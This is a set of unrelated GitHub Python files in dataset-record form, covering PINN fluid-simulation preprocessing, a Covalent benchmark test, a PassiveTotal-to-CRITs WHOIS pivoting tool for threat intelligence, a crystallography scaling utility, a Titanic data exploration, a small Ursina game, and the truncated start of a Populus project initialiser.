data[\"v_rightwall_labels\"],\n data[\"p_rightwall_labels\"],\n test_size=test_size)\n\n return data\n\ndef make_boundary_arrays_contiguous(data):\n \"\"\"\n Concatenate boundary condition arrays into a \n contiguous array to ease training of the PINN\n as all boundary arrays have the same boundary \n condition currently.\n \"\"\"\n data_components = [\"u\",\"v\",\"p\",\"x\",\"y\",\"t\"]\n train_test_components = [\"train\",\"test\"]\n\n for data_component in data_components:\n for train_test_component in train_test_components:\n data[f\"{data_component}_boundary_{train_test_component}\"] = \\\n np.concatenate((\n data[f\"{data_component}_rightwall_{train_test_component}\"],\n data[f\"{data_component}_leftwall_{train_test_component}\"],\n data[f\"{data_component}_basewall_{train_test_component}\"]\n ))\n\n return data\n\ndef extract_boundaries(data):\n \"\"\"\n Extract boundary data from U,V and P arrays\n \"\"\"\n #Handling data labels; fluid properties\n array_labels = [\"u\", \"v\", \"p\"]\n for array_label in array_labels:\n \n #Get boundary data labels\n data[f\"{array_label}_basewall\"] = \\\n data[f\"{array_label}\"][:,0,:]\n \n data[f\"{array_label}_leftwall\"] = \\\n data[f\"{array_label}\"][:,1:-1,0]\n \n data[f\"{array_label}_rightwall\"] = \\\n data[f\"{array_label}\"][:,1:-1,-1]\n\n #Reshape to column format for DL framework\n data[f\"{array_label}_basewall_labels\"] = \\\n data[f\"{array_label}_basewall\"].flatten().reshape(-1,1)\n \n data[f\"{array_label}_leftwall_labels\"] = \\\n data[f\"{array_label}_leftwall\"].flatten().reshape(-1,1)\n \n data[f\"{array_label}_rightwall_labels\"] = \\\n data[f\"{array_label}_rightwall\"].flatten().reshape(-1,1)\n \n #Handling features; x,y,t spatio-temporal locations \n array_labels = [\"x\",\"y\",\"t\"]\n for array_label in array_labels:\n \n #Get boundary data features\n data[f\"basewall_features_{array_label}\"] = data[array_label][:,0,:]\n data[f\"leftwall_features_{array_label}\"] = data[array_label][:,1:-1,0]\n data[f\"rightwall_features_{array_label}\"] = data[array_label][:,1:-1,-1]\n\n #Reshape to column format for DL framework\n array_labels = [\"basewall\",\"rightwall\",\"leftwall\"]\n for array_label in array_labels:\n \n data[f\"features_{array_label}\"] = np.concatenate(\n (\n data[f\"{array_label}_features_t\"].flatten().reshape(-1,1),\n data[f\"{array_label}_features_y\"].flatten().reshape(-1,1),\n data[f\"{array_label}_features_x\"].flatten().reshape(-1,1)\n ), \n axis=1)\n\n return data\n\ndef extract_interior(data):\n \"\"\"\n Extract interior data from U,V and P arrays.\n \"\"\"\n #Handling data labels; fluid properties\n array_labels = [\"u\", \"v\", \"p\"]\n for array_label in array_labels:\n data[f\"{array_label}_interior\"] = data[array_label][:,1:-1,1:-1]\n data[f\"{array_label}_interior_labels\"] = \\\n data[f\"{array_label}_interior\"].flatten().reshape(-1,1)\n \n #Handling features; x,y,t spatio-temporal locations\n array_labels = [\"x\", \"y\", \"t\"]\n for array_label in array_labels:\n data[f\"interior_features_{array_label}\"] = data[array_label][:,1:-1,1:-1]\n\n #Reshape to column format for DL framework\n data[\"features_interior\"] = np.concatenate(\n (\n data[\"interior_features_t\"].flatten().reshape(-1,1),\n data[\"interior_features_y\"].flatten().reshape(-1,1),\n data[\"interior_features_x\"].flatten().reshape(-1,1),\n ),\n axis=1)\n \n return data\n\ndef merge_features(data,geom):\n \"\"\"\n Concatenate features together into a single array.\n \"\"\"\n data[\"y\"], data[\"t\"], data[\"x\"] = np.meshgrid(\n np.linspace(geom[\"y_start\"],geom[\"y_end\"],geom[\"numy\"]),\n np.linspace(geom[\"t_start\"],geom[\"t_end\"],geom[\"numt\"]),\n np.linspace(geom[\"x_start\"],geom[\"x_end\"],geom[\"numx\"]))\n\n #Return an array in form t, x, y\n data[\"features\"] = np.concatenate(\n (\n data[\"t\"].flatten().reshape(-1,1),\n data[\"y\"].flatten().reshape(-1,1),\n data[\"x\"].flatten().reshape(-1,1)\n ),\n axis=1)\n\n return data\n\ndef convert_to_tensors(data,device):\n \"\"\"\n Convert numpy arrays into tensors\n and ensure they reside on the correct PyTorch device\n and have the correct gradient tracking applied\n for automatic differentiation.\n \"\"\"\n geom_components = [\"interior\",\"boundary\"]\n train_test_components = [\"train\",\"test\"]\n\n for geom_component in geom_components:\n for train_test_component in train_test_components:\n\n data[f\"x_{geom_component}_{train_test_component}_tensor\"] = \\\n from_numpy(data[f\"x_{geom_component}_{train_test_component}\"]).\\\n float().requires_grad_().to(device)\n\n data[f\"y_{geom_component}_{train_test_component}_tensor\"] = \\\n from_numpy(data[f\"y_{geom_component}_{train_test_component}\"]).\\\n float().requires_grad_().to(device)\n\n data[f\"t_{geom_component}_{train_test_component}_tensor\"] = \\\n from_numpy(data[f\"t_{geom_component}_{train_test_component}\"]).\\\n float().requires_grad_().to(device)\n\n data[f\"u_{geom_component}_{train_test_component}_tensor\"] = \\\n from_numpy(data[f\"u_{geom_component}_{train_test_component}\"]).\\\n float().requires_grad_().to(device)\n\n data[f\"v_{geom_component}_{train_test_component}_tensor\"] = \\\n from_numpy(data[f\"v_{geom_component}_{train_test_component}\"]).\\\n float().requires_grad_().to(device)\n\n data[f\"p_{geom_component}_{train_test_component}_tensor\"] = \\\n from_numpy(data[f\"p_{geom_component}_{train_test_component}\"]).\\\n float().requires_grad_().to(device)\n\n return data","repo_name":"harrymchugh/pinns","sub_path":"src/cfdpinn/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":11927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6476125499","text":"import random\n\nimport pytest\n\nimport covalent as ct\nfrom covalent._shared_files.util_classes import Status\n\n\n@pytest.mark.parametrize(\"iteration\", range(5))\ndef test_benchmark_primality_test(benchmark, iteration):\n run_benchmark = benchmark[0]\n logger = benchmark[1]\n\n @ct.electron\n def is_prime(n: int) -> bool:\n \"\"\"Primality test using 6k+-1 optimization.\"\"\"\n if n <= 3:\n return n > 1\n if not n % 2 or not n % 3:\n return False\n i = 5\n stop = int(n**0.5)\n while i <= stop:\n if not n % i or not n % (i + 2):\n return False\n i += 6\n return True\n\n @ct.lattice\n def primality_tests(nums_to_test):\n res = []\n for i in nums_to_test:\n entry = {}\n entry[\"num\"] = i\n entry[\"is_prime\"] = is_prime(i)\n res.append(entry)\n return res\n\n nums_to_test = [random.randint(1000, 10000) for i in range(50)]\n\n results, status = run_benchmark(iteration, primality_tests, *[nums_to_test])\n logger.debug(results.dict())\n\n assert status == Status(\"COMPLETED\")\n","repo_name":"AgnostiqHQ/covalent","sub_path":"tests/stress_tests/benchmarks/cpu_intensive_workflows_test.py","file_name":"cpu_intensive_workflows_test.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":584,"dataset":"github-code","pt":"66"} +{"seq_id":"43756574715","text":"#!/usr/bin/env python3\n\nimport argparse\nimport datetime\nimport getpass\nimport json\nimport logging\nimport logging.config\nimport os\nimport re\nimport sys\nimport tabulate\nimport uuid\n\nfrom critsapi.critsapi import CRITsAPI\nfrom critsapi.critsdbapi import CRITsDBAPI\n\nfrom lib.pt.common.config import Config\nfrom lib.pt.common.constants import PT_HOME\nfrom lib.pt.core.database import Database\nfrom lib.pt.ptapi import PTAPI\nfrom lib.crits.vocabulary.indicators import IndicatorTypes as it\nfrom operator import itemgetter\nfrom configparser import ConfigParser\n\nlog = logging.getLogger()\nVERSION = \"0.1337\"\n\n# Check configuration directory\nlocal_config_dir = os.path.join(PT_HOME, 'etc', 'local')\nif not os.path.exists(local_config_dir):\n os.makedirs(local_config_dir)\n sys.exit('No etc/local/ directory. See README to create.')\n\nconfig = Config()\n\n# Check local data directory\nif config.core.cache_enabled:\n if not os.path.exists(config.core.cache_dir):\n log.info('Creating Cache directory in '\n '{}'.format(config.core.cache_dir))\n os.makedirs(config.core.cache_dir)\n\n# Initialize loggin\nlog_path = os.path.join(PT_HOME, 'etc', 'local', 'logging.ini')\ntry:\n logging.config.fileConfig(log_path)\nexcept Exception as e:\n sys.exit('unable to load logging configuration file {}: '\n '{}'.format(log_path, str(e)))\n\npt = PTAPI(username=config.core.pt_username, apikey=config.core.pt_apikey)\npt.set_proxy(http=config.proxy.http, https=config.proxy.https)\n\nargparser = argparse.ArgumentParser()\nargparser.add_argument('QUERY', action='store', help='A value to send as a'\n ' query to PT. Email, phone, name, etc.')\nargparser.add_argument('--dev', dest='dev', action='store_true', default=False)\nargparser.add_argument('--crits', dest='crits', action='store_true',\n default=False, help='Write the results to CRITs with'\n ' appropriate relationships.')\nargparser.add_argument('--test', dest='test', action='store_true',\n default=False, help='Run with test data. (Save PT '\n 'queries)')\nargparser.add_argument('-f', dest='force', action='store_true', default=False,\n help='Force a new API query (do not used cached '\n 'results.')\nargparser.add_argument('-t', action='append', dest='tags', default=[],\n help='Bucket list tags for crits. Multiple -t options '\n 'are allowed.')\n# Add our mutually exclusive items\nmeg = argparser.add_mutually_exclusive_group()\nmeg.add_argument('-n', dest='name', action='store_true', default=False,\n help='The query is a name and pt_query will not try to '\n 'determine the type automatically.')\nmeg.add_argument('-a', dest='address', action='store_true', default=False,\n help='The query is an address and pt_query will not '\n 'try to determine the type automatically.')\nargs = argparser.parse_args()\n\n# Patterns for determining which type of lookup to do\n# Some items cannot be differentiated via regex (name vs address), so we use\n# a flag to specify these\n# Load patterns for regexes\npattern_config = ConfigParser()\npatterns = {}\nwith open(os.path.join(PT_HOME, 'etc', 'patterns.ini')) as fp:\n pattern_config.readfp(fp)\n\nemail_address_pattern = re.compile(pattern_config.get('email', 'pattern'))\nphone_pattern = re.compile(pattern_config.get('phone', 'pattern'))\ndomain_pattern = re.compile(pattern_config.get('domain', 'pattern'))\n\ndatabase = None\nif config.core.cache_enabled:\n database = Database()\n\nif args.crits:\n HOME = os.path.expanduser(\"~\")\n if not os.path.exists(os.path.join(HOME, '.crits_api')):\n print('''Please create a file with the following contents:\n [crits]\n user = lolnate\n\n [keys]\n prod_api_key = keyhere\n dev_api_key = keyhere\n ''')\n raise SystemExit('~/.crits_api was not found or was not accessible.')\n\n crits_config = ConfigParser()\n crits_config.read(os.path.join(HOME, '.crits_api'))\n\n if crits_config.has_option(\"keys\", \"prod\"):\n crits_api_prod = crits_config.get(\"keys\", \"prod\")\n if crits_config.has_option(\"keys\", \"dev\"):\n crits_api_dev = crits_config.get(\"keys\", \"dev\")\n if crits_config.has_option(\"crits\", \"user\"):\n crits_username = crits_config.get(\"crits\", \"user\")\n\n if args.dev:\n crits_url = config.crits.crits_dev_api_url\n crits_api_key = crits_api_dev\n if len(crits_api_key) != 40:\n print(\"Dev API key in ~/.crits_api is the wrong length! Must be 40\\\n characters.\")\n else:\n crits_url = config.crits.crits_prod_api_url\n crits_api_key = crits_api_prod\n if len(crits_api_key) != 40:\n print(\"Prod API key in ~/.crits_api is the wrong length! Must be 40\\\n characters.\")\n\n crits_proxy = {\n 'http': config.crits.crits_proxy_url,\n 'https': config.crits.crits_proxy_url,\n }\n\n # Build our mongo connection\n if args.dev:\n crits_mongo = CRITsDBAPI(mongo_uri=config.crits.mongo_uri_dev,\n db_name=config.crits.database)\n else:\n crits_mongo = CRITsDBAPI(mongo_uri=config.crits.mongo_uri,\n db_name=config.crits.database)\n crits_mongo.connect()\n # Connect to the CRITs API\n crits = CRITsAPI(\n api_url=crits_url,\n api_key=crits_api_key,\n username=crits_username,\n proxies=crits_proxy,\n verify=config.crits.crits_verify\n )\n\nquery = args.QUERY.rstrip()\n# Get the user launching all this\nuser = getpass.getuser()\n\n# Used to store the type of indicator in CRITs for the query object.\ncrits_indicator_type = ''\n\n# Used to store the cache file location\ncache_file = None\n\nif database and not args.force and config.core.cache_enabled:\n cache_file = database.get_cache_file(query)\n if cache_file:\n log.info('Using cache file for query {}'.format(query))\n with open(cache_file) as fp:\n results = json.loads(fp.read())\n\nbucket_list = ['whois', 'pt:query']\nfor t in args.tags:\n bucket_list.append(t)\n\nif args.name or args.address:\n if args.name:\n field_str = 'name'\n if args.address:\n field_str = 'address'\n if args.test:\n results = pt.get_test_results(field=field_str)\n else:\n results = pt.whois_search(query=query, field=field_str)\n\n if database and not cache_file and config.core.cache_enabled:\n filepath = os.path.join(config.core.cache_dir, str(uuid.uuid4()))\n log.debug('Filepath is {}'.format(filepath))\n database.add_results_to_cache(query, user, results, filepath)\n\n base_reference = 'https://www.passivetotal.org/search/whois/'\\\n '{}'.format(field_str)\n # Use our config defined indicator type of whois email objects\n if args.name:\n crits_indicator_type = it.WHOIS_NAME\n if args.address:\n crits_indicator_type = it.WHOIS_ADDR1\n\n bucket_list.append('registrant')\n\nelif re.match(email_address_pattern, query):\n if args.test:\n results = pt.get_test_results(field='email')\n else:\n results = pt.whois_search(query=query, field='email')\n # Now add the results to the db if we have it\n if database and not cache_file and config.core.cache_enabled:\n filepath = os.path.join(config.core.cache_dir, str(uuid.uuid4()))\n log.debug('Filepath is {}'.format(filepath))\n database.add_results_to_cache(query, user, results, filepath)\n\n base_reference = 'https://www.passivetotal.org/search/whois/email'\n # Use our config defined indicator type of whois email objects\n crits_indicator_type = it.WHOIS_REGISTRANT_EMAIL_ADDRESS\n bucket_list.append('registrant')\n\nelif re.match(phone_pattern, query):\n if args.test:\n results = pt.get_test_results(field='phone')\n else:\n results = pt.whois_search(query=query, field='phone')\n # Now add the results to the db if we have it\n if database and not cache_file and config.core.cache_enabled:\n filepath = os.path.join(config.core.cache_dir, str(uuid.uuid4()))\n log.debug('Filepath is {}'.format(filepath))\n database.add_results_to_cache(query, user, results, filepath)\n\n base_reference = 'https://www.passivetotal.org/search/whois/phone'\n crits_indicator_type = it.WHOIS_TELEPHONE\n bucket_list.append('registrant')\n\nelif re.match(domain_pattern, query):\n if args.test:\n results = pt.get_test_results(field='domain')\n else:\n results = pt.whois_search(query=query, field='domain')\n # Now add the results to the db if we have it\n if database and not cache_file and config.core.cache_enabled:\n filepath = os.path.join(config.core.cache_dir, str(uuid.uuid4()))\n log.debug('Filepath is {}'.format(filepath))\n database.add_results_to_cache(query, user, results, filepath)\n\n base_reference = 'https://www.passivetotal.org/search/whois/domain'\n crits_indicator_type = it.DOMAIN\n\nelse:\n raise SystemExit(\"Your query didn't match a known pattern.\")\n\n# Add the query to CRITs regardless of the number of results\n# TODO: Add campaigns\nif args.crits:\n found = False\n # Search for it with raw mongo because API is slow\n crits_result = crits_mongo.find('indicators', {'value': query, 'type':\n crits_indicator_type})\n if crits_result.count() > 0:\n for r in crits_result:\n if r['value'] == query:\n indicator = r\n found = True\n if not found:\n indicator = crits.add_indicator(\n value=query,\n itype=crits_indicator_type,\n source=config.crits.default_source,\n reference='Added via pt_query.py',\n method='pt_query.py',\n bucket_list=bucket_list,\n indicator_confidence='low',\n indicator_impact='low',\n description='Queried with pt_query.py',\n )\n\n # This is pretty hacky - Since we use both the raw DB and the API, we might\n # receive either an '_id' or an 'id' back. We are going to standardize on\n # 'id', rather than '_id'\n if 'id' not in indicator:\n if '_id' not in indicator:\n print(repr(indicator))\n raise SystemExit('id and _id not found for query: '\n '{} in new indicator'.format(query))\n else:\n indicator['id'] = indicator['_id']\n\n# Iterate through all results and print/add to CRITs (if args provided)\nformatted_results = []\nfor result in results['results']:\n if 'domain' in result:\n crits_indicators_to_add = []\n # Row contains:\n # Domain, Registrant Email, Registrant Name, Registrant Date,\n # Expiration Date, Tags\n row = ['', '', '', '', '', '']\n row[0] = result['domain']\n # Email address used to register\n if 'registrant' in result:\n # Append the registrant email\n if 'email' in result['registrant']:\n row[1] = result['registrant']['email']\n email_obj = {\n 'value': result['registrant']['email'],\n 'type': it.WHOIS_REGISTRANT_EMAIL_ADDRESS,\n 'related_to': result['domain']\n }\n crits_indicators_to_add.append(email_obj)\n if 'name' in result['registrant']:\n row[2] = result['registrant']['name']\n name_obj = {\n 'value': result['registrant']['name'],\n 'type': it.WHOIS_NAME,\n 'related_to': result['domain']\n }\n crits_indicators_to_add.append(name_obj)\n if 'telephone' in result['registrant']:\n row[3] = result['registrant']['telephone']\n phone_obj = {\n 'value': result['registrant']['telephone'],\n 'type': it.WHOIS_TELEPHONE,\n 'related_to': result['domain']\n }\n crits_indicators_to_add.append(phone_obj)\n if 'street' in result['registrant']:\n addr1_obj = {\n 'value': result['registrant']['street'],\n 'type': it.WHOIS_ADDR1,\n 'related_to': result['domain']\n }\n crits_indicators_to_add.append(addr1_obj)\n\n # Date the domain was registered\n if 'registered' in result:\n row[4] = result['registered']\n if 'expiresAt' in result:\n row[5] = result['expiresAt']\n formatted_results.append(row)\n # TODO: Tags. They appear to be an extra API query which is annoying\n\n reference = '{0}/{1}'.format(base_reference, query)\n\n if args.crits:\n # Let's try getting the confidence and impact from the parent whois\n # indicator\n confidence = 'low'\n impact = 'low'\n if 'confidence' in indicator:\n if 'rating' in indicator['confidence']:\n confidence = indicator['confidence']['rating']\n if 'impact' in indicator:\n if 'rating' in indicator['impact']:\n impact = indicator['impact']['rating']\n # If not in CRITs, add all the associated indicators\n bucket_list = ['whois pivoting', 'pt:found']\n for t in args.tags:\n bucket_list.append(t)\n new_ind = crits.add_indicator(\n value=result['domain'],\n itype=it.DOMAIN,\n source=config.crits.default_source,\n reference=reference,\n method='pt_query.py',\n bucket_list=bucket_list,\n indicator_confidence=confidence,\n indicator_impact=impact,\n description='Discovered through PT whois pivots'\n )\n\n # The CRITs API allows us to add a campaign to the indicator, but\n # not multiple campaigns at one time,\n # so we will do it directly with the DB.\n # We want to replicate the campaigns of the WHOIS indicator (if\n # a campaign exists) to the new indicator.\n if 'campaign' in indicator:\n for campaign in indicator['campaign']:\n crits_mongo.add_embedded_campaign(\n new_ind['id'],\n 'indicators',\n campaign['name'],\n campaign['confidence'],\n campaign['analyst'],\n datetime.datetime.now(),\n campaign['description']\n )\n\n # If the new indicator and the indicator are not related,\n # relate them.\n if not crits.has_relationship(indicator['id'], 'Indicator',\n new_ind['id'], 'Indicator',\n rel_type='Registered'):\n crits.forge_relationship(indicator['id'], 'Indicator',\n new_ind['id'], 'Indicator',\n rel_type='Registered')\n\n # Now we can add the rest of the WHOIS indicators (if necessary)\n for ind in crits_indicators_to_add:\n # If the indicator exists, just get the id and use it to build\n # relationships. We will look for one with the same source.\n # If not in CRITs, add it and relate it.\n whois_indicator = crits_mongo.find_one(\n 'indicators',\n {\n 'value': ind['value'],\n 'type': ind['type'],\n 'source.name':\n config.crits.default_source,\n })\n if not whois_indicator:\n bucket_list = ['whois pivoting', 'pt:found']\n for t in args.tags:\n bucket_list.append(t)\n whois_indicator = crits.add_indicator(\n value=ind['value'],\n itype=ind['type'],\n source=config.crits.default_source,\n reference=reference,\n method='pt_query.py',\n bucket_list=bucket_list,\n indicator_confidence=confidence,\n indicator_impact=impact,\n description='Discovered through PT whois pivots'\n )\n\n # This is pretty hacky - Since we use both the raw DB and the\n # API, we might receive either an '_id' or an 'id' back. We\n # are going to standardize on 'id', rather than '_id'\n if 'id' not in whois_indicator:\n if '_id' not in whois_indicator:\n print(repr(whois_indicator))\n raise SystemExit('id and _id not found for query: '\n '{} in whois indicator'.format(query))\n whois_indicator['id'] = whois_indicator['_id']\n\n # Not a huge deal, but make sure we don't waste time adding\n # a relationship to itself\n if whois_indicator['id'] == new_ind['id']:\n continue\n # The CRITs API allows us to add a campaign to the indicator,\n # but not multiple campaigns at one time,\n # so we will do it directly with the DB.\n # We want to replicate the campaigns of the WHOIS indicator (if\n # a campaign exists) to the new indicator.\n # Continue with the same campaign\n if 'campaign' in indicator:\n for campaign in indicator['campaign']:\n crits_mongo.add_embedded_campaign(\n whois_indicator['id'],\n 'indicators',\n campaign['name'],\n campaign['confidence'],\n campaign['analyst'],\n datetime.datetime.now(),\n campaign['description']\n )\n\n # If the new indicator and the indicator are not related,\n # relate them.\n if not crits.has_relationship(whois_indicator['id'],\n 'Indicator',\n new_ind['id'],\n 'Indicator',\n rel_type='Registered'):\n crits.forge_relationship(whois_indicator['id'],\n 'Indicator',\n new_ind['id'],\n 'Indicator',\n rel_type='Registered')\n\n# Add a bucket_list item to track that we searched for this whois indicator\nif args.crits:\n crits_mongo.add_bucket_list_item(indicator['id'], 'indicators',\n 'pt:whois_search_completed')\n\n# SORT BY DATE\nformatted_results = sorted(formatted_results, key=itemgetter(3), reverse=True)\n# Row contains:\n# Domain, Registrant Email, Registrant Name, Registrant Telephone,\n# Registrant Date, Expiration Date, Tags\nheaders = ['Domain', 'Registrant Email', 'Registrant Name',\n 'Registrant Telephone', 'Registrant Date', 'Expiration Date',\n 'Tags']\nprint(tabulate.tabulate(formatted_results, headers))\n","repo_name":"IntegralDefense/ptauto","sub_path":"bin/pt_query.py","file_name":"pt_query.py","file_ext":"py","file_size_in_byte":19839,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"18713877002","text":"\n__author__ = [\"S. Basu\"]\n__license__ = \"M.I.T\"\n__date__ = \"28/07/2017\"\n__refactordate__ = \"10/05/2021\"\n\nimport os, sys,glob\nimport logging\nfrom src.abstract import Abstract\nfrom src.xscale_output import OutputParser\n\nlogger = logging.getLogger('sxdm')\n\nclass ScaleUtils(Abstract):\n\n def find_corrects(self, inData):\n self.results['listofCORRECTfiles'] = []\n try:\n for fname in inData['listofHKLfiles']:\n folder = os.path.dirname(fname)\n path = os.path.join(folder, 'CORRECT.LP')\n\n if os.path.isfile(path):\n self.results['listofCORRECTfiles'].append(path)\n\n else:\n logger.info('CORRECT.LP could not be found in %s' %folder)\n self.setFailure()\n except KeyError:\n self.setFailure()\n return\n\n def check_bfactor(self, inData):\n self.find_corrects(inData)\n bfac_dicts = {}\n\n if len(self.results['listofCORRECTfiles']) == 0:\n err = 'ValueError: no CORRECT.LP found'\n logger.info('ValueError: {}'.format(err))\n\n else:\n for fname, cor_name in zip(inData['listofHKLfiles'], self.results['listofCORRECTfiles']):\n fh = open(cor_name, 'r')\n _all = fh.readlines()\n fh.close()\n xasci = fname\n for lines in _all:\n if \"WILSON LINE\" in lines:\n line = lines.split()\n try:\n bfac_dicts[xasci] = float(line[9])\n except Exception:\n logger.info('B-factor might be negative, not considered')\n else:\n pass\n\n self.results['bfac_sorted_hkls'] = sorted(bfac_dicts.items(), key=lambda x : x[1])\n return\n\n def rank_rmeas(self, inData):\n self.find_corrects(inData)\n rmeas_dict = {}\n\n if len(self.results['listofCORRECTfiles']) == 0:\n err = 'ValueError: no CORRECT.LP found'\n logger.info('ValueError: {}'.format(err))\n else:\n for fname, cor_name in zip(inData['listofHKLfiles'], self.results['listofCORRECTfiles']):\n indict = {'CORRECT_file': cor_name}\n correct_parse = OutputParser(indict)\n correct_parse.parse_xds_stats(indict)\n mean_rmeas = correct_parse.mean_rmeas_calc(correct_parse.results['xds_stat'])\n rmeas_dict[fname] = mean_rmeas\n\n self.results['rmeas_sorted_hkls'] = sorted(rmeas_dict.items(), key=lambda x:x[1])\n return\n\n\n def ref_choice(self, inData):\n reference = None\n if inData['fom'] == 'bfac':\n self.check_bfactor(inData)\n try:\n reference = self.results['bfac_sorted_hkls'][0][0]\n\n except (IndexError, ValueError):\n err = 'bfactor selection may not work'\n logger.error(err)\n self.setFailure()\n\n\n elif inData['fom'] == 'rmeas':\n self.rank_rmeas(inData)\n try:\n reference = self.results['rmeas_sorted_hkls'][0][0]\n except (IndexError, ValueError):\n err = 'Rmeas based referenceing may not have worked'\n logger.error(err)\n self.setFailure()\n else:\n pass\n self.results['reference'] = reference\n return\n\n def Bfact_sorter(self, inData):\n bfac_sorted_hkls = []\n self.check_bfactor(inData)\n if len(self.results['bfac_sorted_hkls']) > 0:\n for i in range(len(self.results['bfac_sorted_hkls'])):\n bfac_sorted_hkls.append(self.results['bfac_sorted_hkls'][i][0])\n else:\n err = \"Rmeas based sorting did not work, check\"\n logger.error(err)\n self.setFailure()\n\n self.results['bfact_sorted_hkls'] = bfac_sorted_hkls\n return\n\n def rmeas_sorter(self, inData):\n rmeas_sorted_hkls = []\n self.rank_rmeas(inData)\n if len(self.results['rmeas_sorted_hkls']) > 0:\n for i in range(len(self.results['rmeas_sorted_hkls'])):\n rmeas_sorted_hkls.append(self.results['rmeas_sorted_hkls'][i][0])\n else:\n err = \"Rmeas based sorting did not work, check\"\n logger.error(err)\n self.setFailure()\n self.results['rmeas_sorted_hkls'] = rmeas_sorted_hkls\n return\n\ndef main():\n hklpaths = glob.glob(os.path.join(sys.argv[1], 'XDS_ASCII.HKL'))\n inData = dict()\n inData['listofHKLfiles'] = hklpaths\n sc = ScaleUtils(inData)\n sc.rmeas_sorter(inData)\n print(sc.results['rmeas_sorted_hkls'])\n\nif __name__ == '__main__':\n main()\n","repo_name":"shibom/sxdm","sub_path":"src/scale_utl.py","file_name":"scale_utl.py","file_ext":"py","file_size_in_byte":4804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"3314307710","text":"import warnings#忽略警告提示\nwarnings.filterwarnings('ignore')\n\nimport numpy as np\nimport pandas as pd\n\ntrain=pd.read_csv('train.csv')\ntest=pd.read_csv('test.csv')\nprint('训练数据集:',train.shape,'测试数据集',test.shape)\n\nrowNum_train=train.shape[0]\nrowNum_test=test.shape[0]\nprint('训练集行数:',rowNum_train)\nprint('测试集行数',rowNum_test)\n\nfull_df=train.append(test,ignore_index=True)\nprint('合并后的数据集:',full_df.shape)\n\nprint(full_df.head())#打印前几行\nprint(full_df.describe())#查看数据的统计信息\nprint(full_df.info())#查看每一列的数据类型,数据总数,以及是否有数据缺失\n\nfull_df['Fare']=full_df['Fare'].fillna(full_df['Fare'].mean())\nfull_df['Age']=full_df['Age'].fillna(full_df['Age'].mean())#把年龄和费用(票价)用均值来替代\nprint(full_df['Embarked'].mode())#查看Embark这一列的众数\nfull_df['Embarked']=full_df['Embarked'].fillna(full_df['Embarked'].mode())\n\nprint(full_df.info())\nsex_mapDict={'male':1,'female':0}\nfull_df['Sex']=full_df['Sex'].map(sex_mapDict)\nprint(full_df.head())\n\nembarkedDF=pd.DataFrame()\nembarkedDF=pd.get_dummies(full_df['Embarked'],prefix='Embarked')#使用get_dummies进行one-hot编码,列名前缀是Embarked\nprint(embarkedDF.head())\n\nfull=pd.concat([full_df,embarkedDF],axis=1)#因为这里用了登船港口(Embarked)进行了one-hot编码产生了它的虚拟变量,所以这里把它删掉\nfull.drop('Embarked',axis=1,inplace=True)\nprint(full.head())\nprint(full.shape)\n\nname1='Braund, Mr. Owen Harris'\nstr1=name1.split(',')[1]\nstr2=str1.split('.')[0]\nstr3=str2.split()\n\ndef getTitle(name):\n str1 = name1.split(',')[1]\n str2 = str1.split('.')[0]\n str3 = str2.strip()\n return str3\n\n\n\ntitleDF=pd.DataFrame()\ntitleDF['Title']=full['Name'].map(getTitle)\nprint(titleDF.head())\n\n# full=pd.concat([full,titleDF],axis=1)\n#\n# full.drop('Name',axis=1,inplace=True)\n# print(full.head)\n#\n# corrDF=full.corr()\n# print(corrDF)\n#\n# print(corrDF['Survived'].sort_values(ascending=False))\n#\n# full_X=pd.concat([titleDF],axis=1)\n# print(full_X.head())","repo_name":"2981047480/zephyr","sub_path":"大二机器学习记录/泰坦尼克数据/算法.py","file_name":"算法.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8966484604","text":"#importowanie wszystkich potrzebnych bibliotek i plików\nfrom GameParameters import *\nfrom ursina import *\nfrom Player import *\nfrom Train import *\nfrom Menu import *\nfrom screeninfo import get_monitors\nfrom train_spawner import *\nfrom high_scores import *\n\nGameParameters.paused = True\n#ustawianie pełnego ekranu\nmonitor = get_monitors()\napp = Ursina(fullscreen=True)\nwindow.size = Vec2(monitor[0].width, monitor[0].height)\nwindow.fps_counter.disable()\n#incjalizacja obiektów\nplayer = Player(collider='box', model='cube', position=(0, 0, 0))\nmain_menu = Menu(player)\nfor i in range(8):\n ground = Entity(model='/assets/tunele.glb', collider='box', scale=0.67, position=(0, -7, 110 *i))\n#światło bezpośrednio nad graczem\nL = PointLight(y = 10, x = 0, z = 0, color = color.white, shadows = True)\nplayer.menu = main_menu\n#wygenerowanie początkowych pociągów\nGameParameters.train += train_generator_init(player)\n#ustawienie głośnosci\nAudio.volume_multiplier = 0.5\n\ndef update():\n #przy śmierci usuwanie pociągów i wyświetlanie menu śmierci\n if GameParameters.death == True and GameParameters.paused == False:\n for i in GameParameters.train:\n i.disable()\n GameParameters.train.clear()\n main_menu.death_menu(player)\n #zwiększanie wyniku i szybkości\n if GameParameters.paused == False:\n GameParameters.score += int(time.dt * 100)\n main_menu.score_point.text = \"Score:\" + str(GameParameters.score)\n GameParameters.speed += 0.01\n #pojawianie się pociągów\n if (GameParameters.can_spawn == True and GameParameters.paused == False):\n GameParameters.train += train_generator(player)\n GameParameters.can_spawn = False\n\n#tekstura nieba\nSky(texture='assets/night.jpg')\napp.run()\n","repo_name":"BartoszKaca/subway_clone","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"pl","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"9948245835","text":"import os\nimport shutil\n\nfrom populus import ASSETS_DIR\n\nfrom populus.config.helpers import (\n check_if_json_config_file_exists,\n)\n\nfrom populus.utils.filesystem import (\n ensure_path_exists,\n)\n\nfrom populus.project import (\n Project,\n)\n\nGREETER_SOURCE_PATH = os.path.join(ASSETS_DIR, 'Greeter.sol')\nGREETER_TEST_PATH = os.path.join(ASSETS_DIR, 'test_greeter.py')\n\n\ndef init_project(project_dir, logger):\n\n if project_dir is None:\n project_dir = os.getcwd()\n else:\n project_dir = os.path.abspath(project_dir)\n\n has_json_config = check_if_json_config_file_exists(project_dir)\n\n if has_json_config:\n logger.info(\n 